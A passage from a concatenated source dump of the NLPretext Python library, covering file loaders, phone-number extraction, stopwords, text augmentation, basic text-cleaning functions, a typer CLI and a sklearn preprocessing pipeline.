        with open(file_path_or_string, "rb") as f:
            rawdata = b"".join([f.readline() for _ in range(n_lines)])
    chardet_value: str = chardet.detect(rawdata)
    return chardet_value


def check_text_file_format(filepath: Union[str, List[str]]) -> str:
    """
    Retrieve format of a file path or list of files path, among .csv, .json, .parquet and .txt.

    Parameters
    ----------
    filepath : str | list(str)
        A filepath with wildcard (eg. *.txt), or a list of filepaths.

    Returns
    -------
    str
        Format of the specified file path, among .json, .csv, .parquet or .txt
    """
    pattern = constants.TEXT_FILE_FORMATS_PATTERN
    if not isinstance(filepath, (list, tuple)):
        filepath = [filepath]
    format_re_list = [pattern.match(path) for path in filepath]
    format_list = [format_re.group(1) for format_re in format_re_list if format_re]
    if len(set(format_list)) > 1:
        raise ValueError(f"Multiple file formats found in file path list: {format_list}")
    if None in format_re_list:
        raise ValueError(
            "Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted"  # noqa: E501
        )
    file_format = format_list[0]
    return file_format


================================================
FILE: nlpretext/_utils/pandasloader.py
================================================
from typing import List, Union

import pandas as pd
from fsspec import open_files


def _list_handler(func):
    def wrapper_list_handler(file_path: Union[str, List[str]], *args, **kwargs) -> pd.DataFrame:  # type: ignore
        list_files = open_files(file_path)
        list_df = [func(file.path, *args, **kwargs) for file in list_files]
        df = pd.concat(list_df)
        return df

    return wrapper_list_handler


@_list_handler
def read_text(file_path: str, encoding: str) -> pd.DataFrame:
    df = pd.read_fwf(file_path, encoding=encoding, colspecs=[(None, None)])
    return df


@_list_handler
def read_json(file_path: str, encoding: str) -> pd.DataFrame:
    df = pd.read_json(file_path, encoding=encoding)
    return df


@_list_handler
def read_csv(file_path: str, encoding: str) -> pd.DataFrame:
    df = pd.read_csv(file_path, encoding=encoding)
    return df


@_list_handler
def read_parquet(file_path: str, encoding: str) -> pd.DataFrame:
    df = pd.read_parquet(file_path, encoding=encoding)
    return df


================================================
FILE: nlpretext/_utils/phone_number.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
from typing import List, Optional

import phonenumbers as _phonenumbers
from nlpretext._config.config import FORMAT_NUMBERS, SUPPORTED_COUNTRY


def find_phone_numbers(string: str, region_code: Optional[str] = None) -> List[str]:
    """
    Python port of Google's libphonenumber.
    https://github.com/daviddrysdale/python-phonenumbers.

    Parameters
    ----------
    region_code : str, optional
        If specified, will find the number of the specified country.
    eg. 06.00.00.00.00 if "FR" is specified.

    If not specified, only works for international-formatted phone numbers.
    - ie. phone number with +country code specified
    eg. 06.00.00.00.00 will return an error but +33 6 00 00 00 00 will work.
    supported value: look SUPPORTED_COUNTRY variable.

    Returns
    -------
    list
        list of matched phone numbers.

    Raises
    ------
    ValueError
        if country code is not supported.
    """
    if region_code not in SUPPORTED_COUNTRY:
        raise ValueError("Please enter a valid contry code. See SUPPORTED_COUNTRY list.")
    return [match.raw_string for match in _phonenumbers.PhoneNumberMatcher(string, region_code)]


def extract_phone_numbers(text: str, countrylist: List[Optional[str]]) -> List[str]:
    """
    Find phone numbers in a text, returns a list of phone numbers.

    Parameters
    ----------
    text : str
    countrylist : list (eg. [None,'FR','US','GB'])
        Look for phone numbers formatted according to the specified countlist.
        supported value: look SUPPORTED_COUNTRY variable.

    Returns
    -------
    list
        List of unique phone numbers found.
    """
    all_phone_numbers: List[str] = []
    for country in countrylist:
        new_numbers_founds = find_phone_numbers(text, region_code=country)
        all_phone_numbers.extend(new_numbers_founds)
    return list(set(all_phone_numbers))


class PhoneParser:
    """
    Python port of Google's libphonenumber.
    https://github.com/daviddrysdale/python-phonenumbers.
    """

    def __init__(self):
        self.region_code = None
        self.text = None
        self.parsed_num: Optional[_phonenumbers.PhoneNumber] = None

    @property
    def parsed_num(self) -> Optional[_phonenumbers.PhoneNumber]:
        return self.__parsed_num

    @parsed_num.setter
    def parsed_num(self, value: Optional[_phonenumbers.PhoneNumber]) -> None:
        self.__parsed_num = value

    def parse_number(
        self, text: str, region_code: Optional[str] = None
    ) -> Optional[_phonenumbers.PhoneNumber]:
        """
        Extract phone number from text.

        Parameters
        ----------
        text: str
        region_code : str, optional
            If specified, will find the number of the specified country.
        eg. 06.00.00.00.00 if "FR" is specified.
        If not specified, only works for international-formatted phone numbers.
        - ie. phone number with +country code specified
        eg. 06.00.00.00.00 will return an error but +33 6 00 00 00 00 will work.
        supported value: look SUPPORTED_COUNTRY variable.

        Returns
        -------
        str
            The parsed number

        Raises
        ------
        NumberParseException
            If the string doesn't contains phone number of is the parser fails.
        """
        self.region_code = region_code
        self.text = text
        self.parsed_num: Optional[_phonenumbers.PhoneNumber] = _phonenumbers.parse(
            self.text, self.region_code
        )
        return self.parsed_num

    def format_number(self, num_format: str) -> str:
        """
        Convert a phone number to another standard format.

        Parameters
        ----------
        num_format : str {'E164','INTERNATIONAL','NATIONAL','RFC3966'}

        Returns
        -------
        str
            Number formatted
        """
        standard_format = FORMAT_NUMBERS.get(num_format)
        if standard_format is None:
            raise ValueError(f"Please choose a num_format in {list(FORMAT_NUMBERS.keys())}")
        if self.parsed_num is None:
            raise ValueError(f"Could not parse phone number {self.parsed_num}")
        formatted_number: Optional[str] = _phonenumbers.format_number(
            self.parsed_num, standard_format
        )
        if formatted_number is None:
            raise ValueError(f"Could not format phone number {formatted_number}")
        return formatted_number


================================================
FILE: nlpretext/_utils/stopwords.py
================================================
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License


from typing import List

from nlpretext._config.stopwords import STOPWORDS
from stop_words import LANGUAGE_MAPPING as _LANGUAGE_MAPPING
from stop_words import get_stop_words as _get_stop_words


def get_stopwords(lang: str = "en") -> List[str]:
    """Input a language code, returns a list of stopwords for the specified language.

    Parameters
    ----------
    lang : str
        Supported languages: ['ar', 'bg', 'ca', 'cz', 'da', 'nl', 'en',
         'fi', 'fr', 'de', 'hi', 'hu', 'id', 'it', 'nb', 'pl', 'pt', 'ro', 'ru',
         'sk', 'es', 'sv', 'tr', 'uk', 'vi', 'af', 'ha', 'so', 'st', 'sw', 'yo',
         'zu', 'da', 'de', 'es', 'et', 'fi', 'fr', 'hr', 'hu', 'it', 'ko', 'nl',
          'no', 'pl', 'pt', 'ru', 'sv', 'tr', 'zh', 'eo', 'he', 'la', 'sk', 'sl',
          'br', 'ca', 'cs', 'el', 'eu', 'ga', 'gl', 'hy', 'id', 'ja', 'lv', 'th',
           'ar', 'bg', 'bn', 'fa', 'hi', 'mr', 'ro', 'en']

    Returns
    -------
    list
        list of stopwords for a given language

    Raises
    ------
    ValueError
        When language is not available yet or incorrect country code
    """
    if isinstance(lang, str) and len(lang) == 2:
        lang = lang.lower()
        custom_stopwords = STOPWORDS
        stopwords = []

        supported_lang_lib = list(_LANGUAGE_MAPPING.keys())
        supported_lang_custom = list(custom_stopwords.keys())
        supported_lang = supported_lang_lib + supported_lang_custom
        if lang in supported_lang:
            if lang in supported_lang_lib:
                stopwords += _get_stop_words(lang)
            if lang in supported_lang_custom:
                stopwords += custom_stopwords[lang]
        else:
            raise ValueError(
                "Language not available yet or incorrect country code."
                f" Supported languages: {supported_lang}"
            )
    else:
        raise ValueError('Please input a valid country code, in 2 letters. Eg. "us" for USA. ')
    return list(set(stopwords))


================================================
FILE: nlpretext/augmentation/__init__.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.


================================================
FILE: nlpretext/augmentation/text_augmentation.py
================================================
from typing import Any, Dict, List, Optional, Tuple

import logging
import re
from itertools import combinations

import nlpaug.augmenter.word as naw


class CouldNotAugment(ValueError):  # noqa: D101
    pass


class UnavailableAugmenter(ValueError):  # noqa: D101
    pass


def augment_text(
    text: str,
    method: str,
    stopwords: Optional[List[str]] = None,
    entities: Optional[List[Dict[str, Any]]] = None,
) -> Tuple[str, List[Dict[str, Any]]]:
    """
    Given a text with or without associated entities, generate a new text by
    modifying some words in the initial one, modifications depend on the chosen
    method (substitution with synonym, addition, deletion). If entities are
    given as input, they will remain unchanged. If you want some words other
    than entities to remain unchanged, specify it within the stopwords argument.

    Parameters
    ----------
    text : string
    method : {'wordnet_synonym', 'aug_sub_bert'}
        augmenter to use ('wordnet_synonym' or 'aug_sub_bert')
    stopwords : list, optional
        list of words to freeze throughout the augmentation
    entities : list, optional
        entities associated to text if any, must be in the following format:
        [
            {
                'entity': str,
                'word': str,
                'startCharIndex': int,
                'endCharIndex': int
            },
            {
                ...
            }
        ]

    Returns
    -------
    Augmented text and optional augmented entities
    """
    augmenter = get_augmenter(method, stopwords)
    augmented_text = augmenter.augment(text)
    if entities is not None:
        return process_entities_and_text(entities, text, augmented_text)
    return augmented_text, []


def process_entities_and_text(
    entities: List[Dict[str, Any]], text: str, augmented_text: str
) -> Tuple[str, List[Dict[str, Any]]]:
    """
    Given a list of initial entities, verify that they have not been altered by
    the data augmentation operation and are still in the augmented text.

    Parameters
    ----------
    entities: list
        entities associated to text, must be in the following format:
        [
            {
                'entity': str,
                'word': str,
                'startCharIndex': int,
                'endCharIndex': int
            },
            {
                ...
            }
        ]
    text: str
        initial text
    augmented_text: str
        new text resulting of data augmentation operation

    Returns
    -------
    Augmented text and entities with their updated position in augmented text
    """
    formatted_entities = [
        (
            text[entities[i]["startCharIndex"] : entities[i]["endCharIndex"]].strip(),
            entities[i]["entity"],
        )
        for i in range(len(entities))
    ]
    if are_entities_in_augmented_text(entities, augmented_text):
        augmented_entities = get_augmented_entities(augmented_text, formatted_entities)
        clean_entities = clean_sentence_entities(augmented_text, augmented_entities)
        return augmented_text, clean_entities
    raise CouldNotAugment("Text was not correctly augmented because entities were altered")


def are_entities_in_augmented_text(entities: List[Dict[str, Any]], augmented_text: str) -> bool:
    """
    Given a list of entities, check if all the words associated to each entity
    are still present in augmented text.

    Parameters
    ----------
    entities : list
        entities associated to initial text, must be in the following format:
        [
            {
                'entity': str,
                'word': str,
                'startCharIndex': int,
                'endCharIndex': int
            },
            {
                ...
            }
        ]
    augmented_text : str

    Returns
    -------
    True if all entities are present in augmented text, False otherwise
    """
    check = True
    for ent in entities:
        if ent["word"] not in augmented_text:
            check = False
            return check
    return check


def get_augmenter(method: str, stopwords: Optional[List[str]] = None) -> naw.SynonymAug:
    """
    Initialize an augmenter depending on the given method.

    Parameters
    ----------
    method : str (supported methods: wordnet_synonym and aug_sub_bert)
    stopwords : list
        list of words to freeze throughout the augmentation

    Returns
    -------
    Initialized nlpaug augmenter
    """
    if method == "wordnet_synonym":
        return naw.SynonymAug(aug_src="wordnet", stopwords=stopwords)
    if method == "aug_sub_bert":
        return naw.ContextualWordEmbsAug(
            model_path="bert-base-uncased", action="substitute", stopwords=stopwords
        )
    raise UnavailableAugmenter(
        "The given augmenter is not supported. You must choose one \
        of the following: wordnet_synonym or aug_sub_bert"
    )


def get_augmented_entities(
    sentence_augmented: str, entities: List[Tuple[str, Any]]
) -> List[Dict[str, Any]]:
    """
    Get entities with updated positions (start and end) in augmented text.

    Parameters
    ----------
    sentence_augmented : str
        augmented text
    entities : list
        entities associated to initial text, must be in the following format:
        [
            {
                'entity': str,
                'word': str,
                'startCharIndex': int,
                'endCharIndex': int
            },
            {
                ...
            }
        ]

    Returns
    -------
    Entities with updated positions related to augmented text
    """
    entities_augmented = []
    for entity in entities:
        search = re.search(entity[0].strip(), sentence_augmented)
        if search:
            start_index = search.start()
            end_index = search.end()
            new_entity = {
                "entity": entity[1],
                "word": sentence_augmented[start_index:end_index],
                "startCharIndex": start_index,
                "endCharIndex": end_index,
            }
            entities_augmented.append(new_entity)
    return entities_augmented


def clean_sentence_entities(text: str, entities: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
    """
    Paired entities check to remove nested entities, the longest entity is kept.

    Parameters
    ----------
    text : str
        augmented text
    entities : list
        entities associated to augmented text, must be in the following format:
        [
            {
                'entity': str,
                'word': str,
                'startCharIndex': int,
                'endCharIndex': int
            },
            {
                ...
            }
        ]

    Returns
    -------
    Cleaned entities
    """
    entities_to_clean = [dict(s) for s in {frozenset(d.items()) for d in entities}]
    for element1, element2 in combinations(entities_to_clean, 2):
        result = check_interval_included(element1, element2)
        if result is not None:
            try:
                entities_to_clean.remove(result[0])
            except IndexError:
                logging.warning(
                    "Cant remove entity : {} \n entities are now :{} \n for sentence : {} ".format(
                        result, entities_to_clean, text
                    )
                )
                continue
    return entities_to_clean


def check_interval_included(
    element1: Dict[str, Any], element2: Dict[str, Any]
) -> Optional[Tuple[Dict[str, Any], Dict[str, Any]]]:
    """
    Comparison of two entities on start and end positions to find if they are nested.

    Parameters
    ----------
    element1 : dict
    element2 : dict
        both of them in the following format
        {
            'entity': str,
            'word': str,
            'startCharIndex': int,
            'endCharIndex': int
        }

    Returns
    -------
    If there is an entity to remove among the two returns a tuple
    (element to remove, element to keep).
    If not, returns None
    """
    if (
        (element1 != element2)
        and (element1["startCharIndex"] >= element2["startCharIndex"])
        and (element1["endCharIndex"] <= element2["endCharIndex"])
    ):
        return element1, element2
    if (
        (element1 != element2)
        and (element2["startCharIndex"] >= element1["startCharIndex"])
        and (element2["endCharIndex"] <= element1["endCharIndex"])
    ):
        return element2, element1
    if (
        (element1 != element2)
        and (element1["startCharIndex"] >= element2["startCharIndex"])
        and (element1["endCharIndex"] >= element2["endCharIndex"])
        and (element1["startCharIndex"] <= element2["endCharIndex"] - 1)
    ):
        return element1, element2
    if (
        (element1 != element2)
        and (element2["startCharIndex"] >= element1["startCharIndex"])
        and (element2["endCharIndex"] >= element1["endCharIndex"])
        and (element2["startCharIndex"] < element1["endCharIndex"] - 1)
    ):
        return element2, element1
    return None


================================================
FILE: nlpretext/basic/__init__.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.


================================================
FILE: nlpretext/basic/preprocess.py
================================================
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License


from typing import List, Optional

import re
import unicodedata

from flashtext import KeywordProcessor
from ftfy import fix_text as _fix_text
from nlpretext._config import constants
from nlpretext._utils.phone_number import extract_phone_numbers as _extract_phone_numbers
from nlpretext._utils.stopwords import get_stopwords
from nlpretext.token.tokenizer import tokenize


def normalize_whitespace(text: str) -> str:
    """
    ----
    Copyright 2016 Chartbeat, Inc.
    Code from textacy: https://github.com/chartbeat-labs/textacy
    ----

    Given ``text`` str, replace one or more spacings with a single space, and
    one or more linebreaks with a single newline. Also strip leading/trailing
    whitespace.
    eg. "   foo  bar  " -> "foo bar"

    Parameters
    ----------
    text : string

    Returns
    -------
    string
    """
    text = constants.NONBREAKING_SPACE_REGEX.sub(
        " ", constants.LINEBREAK_REGEX.sub(r"\n", text)
    ).strip()
    return text


def remove_whitespace(text: str) -> str:
    """
    Given ``text`` str, remove one or more spacings and linebreaks.
    Also strip leading/trailing whitespace.
    eg. "   foo  bar  " -> "foobar".

    Parameters
    ----------
    text : string

    Returns
    -------
    string
    """
    return constants.NONBREAKING_SPACE_REGEX.sub(
        "", constants.LINEBREAK_REGEX.sub("", text)
    ).strip()


def lower_text(text: str) -> str:
    """
    Given ``text`` str, transform it into lowercase.

    Parameters
    ----------
    text : string

    Returns
    -------
    string
    """
    return text.lower()


def filter_groups(token: str, ignored_stopwords: Optional[List[str]] = None) -> str:
    """
    Given ``token`` str and a list of groups of words
    that were concatenated into tokens, reverses the tokens
    to their ungrouped state.

    Parameters
    ----------
    token : string
    ignored_stopwords : list of strings

    Returns
    -------
    string
    """
    if ignored_stopwords:
        for group in ignored_stopwords:
            if token == remove_whitespace(group):
                token = group
    return token


def ungroup_ignored_stopwords(
    tokens: List[str], ignored_stopwords: Optional[List[str]] = None
) -> List[str]:
    """
    Given ``tokens`` list of str and a list of groups of words
    that are concatenated in tokens, reverses the tokens to
    their ungrouped state.

    Parameters
    ----------
    tokens : list of strings
    ignored_stopwords : list of strings

    Returns
    -------
    list of strings
    """
    return [filter_groups(token, ignored_stopwords) for token in tokens]


def remove_stopwords(
    text: str,
    lang: str,
    custom_stopwords: Optional[List[str]] = None,
    ignored_stopwords: Optional[List[str]] = None,
) -> str:
    """
    Given ``text`` str, remove classic stopwords for a given language and
    custom stopwords given as a list. Words and groups of words from
    ignored_stopwords list are ignored during stopwords removal.

    Parameters
    ----------
    text : string
    lang : string
    custom_stopwords : list of strings
    ignored_stopwords : list of strings

    Returns
    -------
    string

    Raises
    ------
    ValueError
        if ``custom_stopwords``  and ``ignored_stopwords`` have common elements.
    """
    if custom_stopwords and ignored_stopwords:
        common_elements = set(custom_stopwords).intersection(set(ignored_stopwords))
        if common_elements != set():
            raise ValueError(
                f"Found common words in custom_stopwords and ignored_stopwords: \
                {common_elements}. Please remove duplicated values."
            )
    stopwords = get_stopwords(lang)
    if ignored_stopwords:
        keyword_processor = KeywordProcessor()
        singletons_to_keep = [x for x in ignored_stopwords if len(x.split()) == 1]
        for group_of_words in ignored_stopwords:
            keyword_processor.add_keyword(group_of_words, remove_whitespace(group_of_words))
        text = keyword_processor.replace_keywords(text)
    else:
        singletons_to_keep = []
    if custom_stopwords:
        stopwords += custom_stopwords
    if not text:
        raise ValueError("Found empty text. Please fix it before using this function.")
    if lang in ["fr", "en"]:
        lang_module = {"fr": "fr_spacy", "en": "en_spacy"}[lang]
        tokens = tokenize(text, lang_module)
    else:
        tokens = text.split()
    tokens = [t for t in tokens if (t not in stopwords or t in singletons_to_keep)]
    tokens = ungroup_ignored_stopwords(tokens, ignored_stopwords)
    return " ".join(tokens)


def remove_eol_characters(text: str) -> str:
    r"""
    Remove end of line (\n) char.

    Parameters
    ----------
    text : str

    Returns
    -------
    str
    """
    text = text.replace("\n", " ")
    return text


def fix_bad_unicode(text: str, normalization: str = "NFC") -> str:
    """
    ----
    Copyright 2016 Chartbeat, Inc.
    Code from textacy: https://github.com/chartbeat-labs/textacy
    ----

    Fix unicode text that's "broken" using `ftfy
    <http://ftfy.readthedocs.org/>`_;
    this includes mojibake, HTML entities and other code cruft,
    and non-standard forms for display purposes.

    Parameters
    ----------
    text : string

    normalization ({'NFC', 'NFKC', 'NFD', 'NFKD'}):
        if 'NFC', combines characters and diacritics written using separate
        code points, e.g. converting "e" plus an acute accent modifier into
        "é"; unicode
        can be converted to NFC form without any change in its meaning!
        if 'NFKC', additional normalizations are applied that can change
        the meanings of characters, e.g. ellipsis characters will be replaced
        with three periods

    Returns
    -------
    string
    """
    text = _fix_text(text, normalization=normalization)
    return text


def unpack_english_contractions(text: str) -> str:
    """
    ----
    Copyright 2016 Chartbeat, Inc.
    Code from textacy: https://github.com/chartbeat-labs/textacy
    ----

    Replace *English* contractions in ``text`` str with their unshortened
    forms.
    N.B. The "'d" and "'s" forms are ambiguous (had/would, is/has/possessive),
    so are left as-is.
    eg. "You're fired. She's nice." -> "You are fired. She's nice."

    Parameters
    ----------
    text : string

    Returns
    -------
    string
    """
    # standard
    text = constants.CONTRACTION_NT_NOT.sub(
        r"\1\2 not",
        text,
    )
    text = constants.CONTRACTION_LL_WILL.sub(
        r"\1\2 will",
        text,
    )
    text = constants.CONTRACTION_RE_ARE.sub(r"\1\2 are", text)
    text = constants.CONTRACTION_VE_HAVE.sub(
        r"\1\2 have",
        text,
    )
    text = constants.CONTRACTION_CANT_CANNOT.sub(r"\1\2n not", text)
    text = constants.CONTRACTION_M_AM.sub(r"\1\2 am", text)
    text = constants.CONTRACTION_LET_LETUS.sub(r"\1\2 us", text)
    text = constants.CONTRACTION_WONT_WILLNOT.sub(r"\1\2ill not", text)
    text = constants.CONTRACTION_SHANT_SHALLNOT.sub(r"\1\2hall not", text)
    text = constants.CONTRACTION_YALL_YOUALL.sub(r"\1\2ou all", text)
    return text


def replace_urls(text: str, replace_with: str = "*URL*") -> str:
    """
    ----
    Copyright 2016 Chartbeat, Inc.
    Code from textacy: https://github.com/chartbeat-labs/textacy
    ----

    Replace all URLs in ``text`` str with ``replace_with`` str.

    Parameters
    ----------
    text : string
    replace_with : string
        the string you want the URL to be replaced with.

    Returns
    -------
    string
    """
    text = constants.URL_REGEX.sub(replace_with, constants.SHORT_URL_REGEX.sub(replace_with, text))
    return text


def replace_emails(text: str, replace_with: str = "*EMAIL*") -> str:
    """
    ----
    Copyright 2016 Chartbeat, Inc.
    Code from textacy: https://github.com/chartbeat-labs/textacy
    ----

    Replace all emails in ``text`` str with ``replace_with`` str

    Parameters
    ----------
    text : string
    replace_with : string
        the string you want the email address to be replaced with.

    Returns
    -------
    string
    """
    text = constants.EMAIL_REGEX.sub(replace_with, text)
    return text


def replace_phone_numbers(
    text: str,
    country_to_detect: List[Optional[str]],
    replace_with: str = "*PHONE*",
    method: str = "regex",
) -> str:
    """
    ----
    Copyright 2016 Chartbeat, Inc.
    Inspired code from textacy: https://github.com/chartbeat-labs/textacy
    ----

    Replace all phone numbers in ``text`` str with ``replace_with`` str

    Parameters
    ----------
    text : string
    replace_with : string
        the string you want the phone number to be replaced with.
    method : ['regex','detection']
        regex is faster but will omit a lot of numbers, while detection will
        catch every numbers, but takes a while.
    country_to_detect : list
        If a list of country code is specified, will catch every number
        formatted.
        Only when method = 'detection'.

    Returns
    -------
    string
    """
    if method == "regex":
        text = constants.PHONE_REGEX.sub(replace_with, text)
    elif method == "detection":
        found_nums = _extract_phone_numbers(text, countrylist=country_to_detect)

        # order by lenght to avoid truncated numbers to be removed first.
        found_nums.sort(key=len, reverse=True)
        for phone_number in found_nums:
            text = text.replace(phone_number, replace_with)
    else:
        raise ValueError(
            'Please input a valid method between "regex" or \
            "detection"'
        )
    return text


def replace_numbers(text: str, replace_with: str = "*NUMBER*") -> str:
    """
    ----
    Copyright 2016 Chartbeat, Inc.
    Code from textacy: https://github.com/chartbeat-labs/textacy
    ----

    Replace all numbers in ``text`` str with ``replace_with`` str.

    Parameters
    ----------
    text : string
    replace_with : string
        the string you want the number to be replaced with.

    Returns
    -------
    string
    """
    text = constants.NUMBERS_REGEX.sub(replace_with, text)
    return text


def replace_currency_symbols(text: str, replace_with: Optional[str] = None) -> str:
    """
    ----
    Copyright 2016 Chartbeat, Inc.
    Code from textacy: https://github.com/chartbeat-labs/textacy
    ----

    Replace all currency symbols in ``text`` str with string specified by
    ``replace_with`` str.

    Parameters
    ----------
    text : str
        raw text
    replace_with : None or string
        if None (default), replace symbols with
            their standard 3-letter abbreviations (e.g. '$' with 'USD', '£'
            with 'GBP'); otherwise, pass in a string with which to replace all
            symbols (e.g. "*CURRENCY*")

    Returns
    -------
    string
    """
    if replace_with is None:
        for k, v in constants.CURRENCIES.items():
            text = text.replace(k, v)
    else:
        text = constants.CURRENCY_REGEX.sub(replace_with, text)
    return text


def remove_punct(text: str, marks: Optional[str] = None) -> str:
    """
    Remove punctuation from ``text`` by replacing all instances of ``marks``
    with whitespace.

    Parameters
    ----------
    text : str
        raw text

    marks : str or None
        If specified, remove only the characters in this string,
        e.g. ``marks=',;:'`` removes commas, semi-colons, and colons.
        Otherwise, all punctuation marks are removed.

    Returns
    -------
    string

    Note
    -------
    When ``marks=None``, Python's built-in :meth:`str.translate()` is
    used to remove punctuation; otherwise, a regular expression is used
    instead. The former's performance is about 5-10x faster.
    """
    if marks:
        text = re.sub(f"[{re.escape(marks)}]+", " ", text, flags=re.UNICODE)
    else:
        text = text.translate(constants.PUNCT_TRANSLATE_UNICODE)
    return text


def remove_accents(text: str, method: str = "unicode") -> str:
    """
    Remove accents from any accented unicode characters in ``text`` str,
    either by transforming them into ascii equivalents or removing them
    entirely.

    Parameters
    ----------
    text : str
        raw text

    method : ({'unicode', 'ascii'})
        if 'unicode', remove accented
        char for any unicode symbol with a direct ASCII equivalent; if 'ascii',
        remove accented char for any unicode symbol

        NB: the 'ascii' method is notably faster than 'unicode', but less good

    Returns
    -------
    string

    Raises
    ------
    ValueError
        if ``method`` is not in {'unicode', 'ascii'}
    """
    if method == "unicode":
        text = "".join(
            c for c in unicodedata.normalize("NFKD", text) if not unicodedata.combining(c)
        )
    elif method == "ascii":
        text = unicodedata.normalize("NFKD", text).encode("ascii", errors="ignore").decode("ascii")
    else:
        msg = f'`method` must be either "unicode" and "ascii", not {method}'
        raise ValueError(msg)
    return text


def remove_multiple_spaces_and_strip_text(text: str) -> str:
    """
    Remove multiple spaces, strip text, and remove '-', '*' characters.

    Parameters
    ----------
    text : str
        the text to be processed

    Returns
    -------
    string
        the text with removed multiple spaces and strip text
    """
    regex_remove_multiple_spaces_list = ["\\t", "[\\s\\-\\*]{2,}"]
    for regex_remove_multiple_spaces in regex_remove_multiple_spaces_list:
        text = re.sub(regex_remove_multiple_spaces, " ", text)
        text = text.strip()
    return text


def filter_non_latin_characters(text: str) -> str:
    """
    Function that filters non latin characters of a text.

    Parameters
    ----------
    text : string

    Returns
    -------
    string
    """
    text = constants.LATIN_CHARACTERS_RE.sub(" ", text)
    text = normalize_whitespace(text)
    return text


================================================
FILE: nlpretext/cli/__init__.py
================================================


================================================
FILE: nlpretext/cli/__main__.py
================================================
# mypy: disable-error-code="attr-defined"

import typer
from nlpretext import __version__
from nlpretext.cli import preprocess
from rich.console import Console

app = typer.Typer(
    name="nlpretext",
    help="All the goto functions you need to handle NLP use-cases, integrated in NLPretext",
    add_completion=True,
)
app.add_typer(preprocess.app, name="preprocess")
console = Console()


def version_callback(value: bool) -> None:
    """Prints the version of the package."""
    if value:
        console.print(f"[yellow]nlpretext[/] version: [bold blue]{__version__}[/]")
        raise typer.Exit()


================================================
FILE: nlpretext/cli/preprocess.py
================================================
from typing import List

import typer
from nlpretext.preprocessor import Preprocessor
from nlpretext.textloader import TextLoader
from rich.console import Console

app = typer.Typer()
console = Console()


@app.command()
def run(
    input: List[str] = typer.Option(  # noqa: B008
        [],
        "-i",
        "--input",
        case_sensitive=False,
        help="List of files that will be preprocessed",
    ),
    output: str = typer.Option(
        None,
        "-o",
        "--output",
        case_sensitive=False,
        help="File that will store the result of the preprocessing",
    ),
) -> None:
    """Runs NLPretext on a list of files and outputs the result in parquet format
    or shows the result if no output is provided.

    Args:

        input: List of files that will be preprocessed

        output: File that will store the result of the preprocessing
    """
    text_loader = TextLoader()
    preprocessor = Preprocessor()
    preprocessed_text_dataframe = text_loader.read_text(input, preprocessor=preprocessor)
    if output:
        preprocessed_text_dataframe.to_parquet(output)
    else:
        console.print(preprocessed_text_dataframe)


================================================
FILE: nlpretext/preprocessor.py
================================================
from typing import Any, Callable, Dict, List, Optional

from nlpretext.basic.preprocess import fix_bad_unicode, normalize_whitespace, remove_eol_characters
from nlpretext.social.preprocess import (
    remove_emoji,
    remove_hashtag,
    remove_html_tags,
    remove_mentions,
)
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import FunctionTransformer


class Preprocessor:
    def __init__(self):
        """Initialize preprocessor object to apply all text transformation."""
        self.__operations = []
        self.pipeline = None

    def pipe(self, operation: Callable[[Any], Any], args: Optional[Dict[str, Any]] = None) -> None:
        """
        Add an operation and its arguments to pipe in the preprocessor.

        Parameters
        ----------
        operation : callable
            text preprocessing function
        args : dict of arguments
        """
        self.__operations.append({"operation": operation, "args": args})

    @staticmethod
    def build_pipeline(operation_list: List[Dict[Any, Any]]) -> Pipeline:
        """
        Build sklearn pipeline from a operation list.

        Parameters
        ----------
        operation_list : iterable
            list of __operations of preprocessing

        Returns
        -------
        sklearn.pipeline.Pipeline
        """
        return Pipeline(
            steps=[
                (
                    operation["operation"].__name__,
                    FunctionTransformer(operation["operation"], kw_args=operation["args"]),
                )
                for operation in operation_list
            ]
        )

